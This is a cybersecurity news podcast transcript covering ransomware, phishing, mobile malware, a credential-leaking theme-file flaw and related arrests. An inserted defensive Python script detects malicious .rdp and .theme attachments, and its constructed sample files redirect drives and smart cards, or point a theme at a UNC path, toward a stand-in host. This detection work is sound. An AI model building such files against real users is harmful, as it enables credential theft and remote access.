
Password snafu sparks election security questions.
Colorado election officials downplay a partial password leak. Over 22,000 CyberPanel instances were targeted in a ransomware attack. Google issues a critical security update for Chrome. Microsoft says Russia’s SVR is conducting a wide-ranging phishing campaign. The FakeCall Android banking trojan gains advanced evasion and espionage capabilities. A new 0patch fix blocks malicious theme files. iOS malware LightSpy adds destructive features. LinkedIn faces class-action lawsuits over alleged privacy violations. The U.S. charges a Russian national as part of Operation Magnus. On this week’s CertByte segment, Chris Hare is joined by Dan Neville to break down a question targeting the Certified Associate in Project Management (CAPM)® certification. An ex-Disney staffer allegedly adds a side of sabotage to park menus.
Today is Wednesday October 30th 2024. I’m Dave Bittner. And this is your CyberWire Intel Briefing.
Colorado election officials downplay a partial password leak.
A partial password leak for Colorado election machines, discovered on the state’s website, does not pose a threat to system security, according to the Colorado secretary of state’s office. The passwords, visible due to a spreadsheet tab error, have reportedly been accessible since August but require physical access to be usable. Colorado’s voting machines remain offline and secured in rooms with badge-restricted entry and 24/7 camera surveillance. Additionally, two separate passwords are required for each machine, held by different parties. The leak, highlighted by Colorado GOP official Hope Scheppelman, could fuel distrust or misinformation. However, cybersecurity expert Chris Krebs noted that robust security layers prevent any technical impact. The Cybersecurity and Infrastructure Security Agency (CISA) has been notified to monitor the situation. The breach echoes past election security concerns in Colorado, where former official Tina Peters was sentenced to nine years in federal prison over a 2020 voting machine breach.
Over 50 million Americans have already cast their ballots, while foreign interference efforts from Russia, China, and Iran have been largely contained, according to the Foundation for Defense of Democracies. Despite some influence campaigns, the U.S. is better prepared than in 2016, with real-time warnings and resources from agencies like CISA to counter disinformation. Additionally, authorities are investigating physical threats after ballot box fires in Oregon and Washington. Protections are in place to ensure impacted voters can recast their votes.
Over 22,000 CyberPanel instances were targeted in a ransomware attack.
Over 22,000 CyberPanel instances were targeted in a ransomware attack exploiting a critical vulnerability, allowing remote code execution with root access. CyberPanel is an open-source web hosting control panel designed for managing websites and servers. The flaw, disclosed by researcher DreyAnd, involves three main issues: defective authentication, command injection, and security filter bypass, which together allow attackers to execute arbitrary commands on vulnerable servers. The PSAUX ransomware, which surfaced in June 2024, exploited these flaws, encrypting files on affected servers and leaving ransom notes.
LeakIX, a threat intelligence service, reported that almost half of the vulnerable servers were in the U.S., but their numbers quickly dropped as attackers took them offline. LeakIX has since released a decryptor for the ransomware, although users are urged to back up data before using it to avoid potential corruption. CyberPanel users are strongly advised to apply the latest security patch on GitHub immediately.
Google issues a critical security update for Chrome.
Google has issued a critical security update for Chrome. The update addresses two serious issues: a CVE-2024-10487 out-of-bounds write vulnerability in the Dawn graphics system, potentially enabling remote code execution, and a CVE-2024-10488 “use after free” flaw in WebRTC that could cause system crashes or breaches. Users are advised to update Chrome immediately to mitigate these risks.
Microsoft says Russia’s SVR is conducting a wide-ranging phishing campaign.
Microsoft has reported that Russia’s SVR intelligence agency, via the Midnight Blizzard (APT29 or Cozy Bear) group, is conducting a wide-ranging phishing campaign targeting governments, NGOs, academia, and defense sectors. Unusual for this group, the campaign involves RDP configuration file attachments, which, when executed, link victims’ systems to attacker-controlled servers. This setup exposes local system resources like hard drives, peripherals, and even user credentials, enabling malware installation and continued remote access.
The phishing emails, often in Ukrainian, impersonate Microsoft and other tech providers to appear legitimate. This marks a shift for Midnight Blizzard, which typically conducts more targeted, stealthy attacks. Microsoft, CERT-UA, and Amazon have been tracking this campaign since its October 22 start, noting it may have been planned since August. Midnight Blizzard, responsible for previous breaches, including a major Microsoft system breach exposing US government emails, often seeks sensitive data for Russian intelligence.
The FakeCall Android banking trojan gains advanced evasion and espionage capabilities.
The FakeCall Android banking trojan, primarily targeting South Korea, has evolved with advanced evasion and espionage capabilities. Distributed via phishing to prompt users to download a malicious APK, FakeCall connects to a command-and-control (C2) server, allowing attackers to intercept calls and redirect users to fraudulent numbers posing as banks, where they request sensitive information. Recent research by Zimperium’s zLabs reveals increased complexity, including encrypted code, Bluetooth and screen state monitoring, and accessibility services enabling remote control over the device’s interface.
This upgrade allows FakeCall to manipulate the device by simulating screen interactions, uploading images, disabling Bluetooth, and setting itself as the default dialer. Researchers note the malware’s sophisticated techniques, resembling those in state-sponsored espionage, now enable attackers to create a “man-in-the-device” scenario, jeopardizing not only individuals but also organizations and governments lacking robust mobile protections.
A new 0patch fix blocks malicious theme files.
0patch [zero-patch] has released free micropatches for Windows users to address a vulnerability in theme files that can leak NTLM credentials simply by viewing a malicious theme file. Discovered during Microsoft’s patch for CVE-2024-38030, this vulnerability stems from Windows theme files pointing to network paths, inadvertently sending user credentials. While Microsoft’s patch for the related CVE-2024-21320 issue used the PathIsUNC function to block network paths, this was bypassed, prompting 0patch to create an additional fix.
The micropatch applies to both legacy and updated Windows Workstation versions, offering free protection until Microsoft releases an official patch. Notably, 0patch does not support Windows Server, where theme files require active application to pose a threat.
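The two attachment formats in the Midnight Blizzard and 0patch items above share one property: a file that looks inert on disk makes the Windows client reach out to a host named inside it, and in doing so hands over local resources or NTLM credentials. Added to this transcript as a worked example (not code from the broadcast, from Microsoft, 0patch, or the researchers cited), the Python script below triages .rdp and .theme files before a user opens them: it lists the remote host and every documented resource-redirection setting an .rdp file enables, and flags any .theme value that is a network path. The sample files are constructed; the BrandImage and Wallpaper key names in the sample, and the choice to treat //host/ and \\?\UNC\ forms as network paths alongside \\host\, are this example's assumptions rather than anything the reports state.

```python
# Added example for this briefing (not code from Microsoft, 0patch, or the researchers
# cited): triage .rdp and .theme attachments for settings that make a Windows client
# connect out or hand local resources and credentials to a remote host.
# The sample files at the bottom are constructed for the demo.
import re
from typing import Dict, List

# Documented .rdp file keys whose values share local resources with the remote host.
RDP_REDIRECT_FLAGS = {          # key -> enabled when the value is "1"
    "redirectclipboard": "clipboard",
    "redirectprinters": "printers",
    "redirectsmartcards": "smart cards",
    "redirectcomports": "COM ports",
    "remoteapplicationmode": "RemoteApp mode (session disguised as a local app)",
}
RDP_REDIRECT_LISTS = {          # key -> enabled when the value is non-empty ("*" = all)
    "drivestoredirect": "local drives",
    "devicestoredirect": "PnP devices",
    "usbdevicestoredirect": "USB devices",
}

# Network-path targets: \\server\share, //server/share and the \\?\UNC\server\share form.
# Treating all three as network paths is an assumption of this example; it is deliberately
# broader than a plain "starts with two backslashes" check.
NETWORK_PATH_RE = re.compile(r"^\s*(\\\\\?\\UNC\\|\\\\|//)[^\\/\s]+[\\/]", re.IGNORECASE)


def parse_rdp(text: str) -> Dict[str, str]:
    """Parse 'key:type:value' lines of an .rdp file into {key: value} (keys lowercased)."""
    settings: Dict[str, str] = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        parts = line.split(":", 2)       # maxsplit keeps 'host:port' values intact
        if len(parts) != 3:
            continue
        key, _type, value = parts
        settings[key.strip().lower()] = value.strip()
    return settings


def rdp_findings(text: str) -> List[str]:
    """Return human-readable findings for an .rdp file; an empty list means nothing flagged."""
    s = parse_rdp(text)
    findings: List[str] = []
    if s.get("full address"):
        findings.append(f"connects to {s['full address']}")
    for key, what in RDP_REDIRECT_LISTS.items():
        if s.get(key):
            findings.append(f"{key}={s[key]}: shares {what} with remote host")
    for key, what in RDP_REDIRECT_FLAGS.items():
        if s.get(key) == "1":
            findings.append(f"{key}=1: {what}")
    return findings


def parse_ini(text: str) -> Dict[str, Dict[str, str]]:
    """Minimal INI parser for .theme files: {section: {key: value}}."""
    sections: Dict[str, Dict[str, str]] = {}
    current = ""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            sections.setdefault(current, {})
        elif "=" in line:
            key, value = line.split("=", 1)
            sections.setdefault(current, {})[key.strip()] = value.strip()
    return sections


def theme_findings(text: str) -> List[str]:
    """Flag every .theme value that is a network path: rendering the theme makes Windows
    fetch that resource and, over SMB, offer the user's NTLM credentials to its host."""
    findings: List[str] = []
    for section, kv in parse_ini(text).items():
        for key, value in kv.items():
            if NETWORK_PATH_RE.match(value):
                findings.append(f"[{section}] {key} -> {value}")
    return findings


# Constructed samples (not real attachments from the campaigns described above).
SAMPLE_RDP = """\
full address:s:203.0.113.10
drivestoredirect:s:*
redirectclipboard:i:1
redirectsmartcards:i:1
remoteapplicationmode:i:1
"""
SAMPLE_THEME = """\
[Theme]
DisplayName=Quarterly Report
BrandImage=\\\\203.0.113.20\\share\\brand.png
[Control Panel\\Desktop]
Wallpaper=C:\\Windows\\Web\\Wallpaper\\Windows\\img0.jpg
"""

if __name__ == "__main__":
    for name, found in (("rdp", rdp_findings(SAMPLE_RDP)), ("theme", theme_findings(SAMPLE_THEME))):
        print(f"{name}: {'; '.join(found) if found else 'clean'}")
```

Run it over extracted mail attachments and treat a non-empty findings list as the trigger. For .rdp files, an unfamiliar full address combined with drivestoredirect or redirectsmartcards is the case to escalate, since that combination is exactly what exposes the victim's drives and smart-card credentials in the campaign described above; for .theme files, any network path at all is enough, because the credential leak happens on render rather than on any user action.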
iOS malware LightSpy adds destructive features.
A recent iOS-targeted update to the LightSpy malware has expanded its plugin count from 12 to 28, adding destructive functions, according to ThreatFabric. Originally observed in 2020, LightSpy targeted Hong Kong iPhones, exploiting iOS vulnerabilities to access location, call history, messages, and passwords. The malware has since appeared in Android and macOS versions and recently targeted South Asia, likely India. The latest iOS variant, which affects devices up to iOS 13.3, includes plugins for data theft, device freezing, browser history wiping, file deletion, and Wi-Fi profile removal. The non-persistent jailbreak used by attackers allows reboots to clear the malware, though reinfection remains a risk. Evidence suggests a Chinese state-sponsored group may be behind LightSpy.
LinkedIn faces class-action lawsuits over alleged privacy violations.
LinkedIn faces multiple class-action lawsuits in California, alleging privacy violations over its use of web tracking tools on medical websites. The lawsuits claim LinkedIn’s Insight Tag tracked users’ interactions on healthcare platforms, including sensitive data on medical bookings without consent. Plaintiffs include users of Spring Fertility, Therapymatch (Headway), and CityMD. Allegedly, LinkedIn intercepted highly personal information, including treatment types and patient sexual orientation. Co-defendants Meta and Spring Fertility are accused of collaborating in this data interception.
These lawsuits echo broader concerns over social media trackers on healthcare websites, as federal agencies like the FTC warn of potential HIPAA and privacy law violations. Meanwhile, privacy experts advise healthcare providers to avoid using tracking pixels on sensitive sites, given risks of re-identifying users and data exposure. Recently, LinkedIn also faced a €310 million GDPR fine in Ireland over similar privacy issues involving data tracking.
The U.S. charges a Russian national as part of Operation Magnus.
The U.S. has charged Russian national Maxim Rudometov with creating and managing the Redline infostealer malware, used in millions of infections worldwide. Part of Operation Magnus, an international effort led by Dutch police, the case details years of FBI investigations that connected Rudometov’s online aliases and activities across IP addresses, emails, social media, and gaming profiles. The malware, sold as a malware-as-a-service, collects sensitive data like credentials and financial information from infected devices. The FBI traced Rudometov through logs from Redline’s licensing server, showing financial and IP links to his Yandex email, iCloud, and Binance accounts. Though he faces up to 35 years in prison, Rudometov remains at large in Russia, limiting immediate enforcement possibilities.
We’ve got our CertByte segment up next. N2K’s Chris Hare is joined by Dan Neville to break down a question from N2K's PMI® Certified Associate in Project Management (CAPM®) Practice Test.
We’ll be right back.
Welcome back. You can find links in our show notes.
An ex-Disney staffer allegedly adds a side of sabotage to park menus.
And finally, in a tale of digital mischief gone too far, a former Disney worker, Michael Scheuer, allegedly hacked into Disney’s proprietary menu software after being let go. According to a federal complaint, Scheuer allegedly used old login credentials to access the menu system, sneaking in changes that included turning fonts to Wingdings, slipping profanity onto menus, and—most dangerously—mislabeling peanut-allergenic foods as “safe.” Thankfully, Disney caught the altered menus before they reached customers. But Scheuer didn’t stop there: he reportedly hijacked QR codes on outdoor menus to redirect to boycott websites, locked employees out of their accounts with endless login attempts, and even showed up at one ex-colleague’s home. The DOJ and Disney remain mum on the specifics, but Scheuer’s alleged antics are a reminder that grudges—and digital footprints—can lead to more than a slap on the wrist.
And that’s the CyberWire.
For links to all of today’s stories, check out our Daily Briefing at the cyberwire dot com.
We’d love to know what you think of this podcast. Your feedback ensures we deliver the insights that keep you a step ahead in the rapidly changing world of cybersecurity. If you like the show, please share a rating and review in your podcast app. Please also fill out the survey in the show notes or send an email to cyberwire@n2k.com.
We’re privileged that N2K CyberWire is part of the daily routine of the most influential leaders and operators in the public and private sector, from the Fortune 500 to many of the world’s preeminent intelligence and law enforcement agencies.
N2K makes it easy for companies to optimize your biggest investment, your people. We make you smarter about your teams, while making your teams smarter. Learn how at n2k.com.
This episode was produced by Liz Stokes. Our mixer is Tré Hester, with original music and sound design by Elliott Peltzman. Our executive producer is Jennifer Eiben. Our executive editor is Brandon Karpf. Simone Petrella is our president. Peter Kilpe is our publisher, and I’m Dave Bittner. Thanks for listening.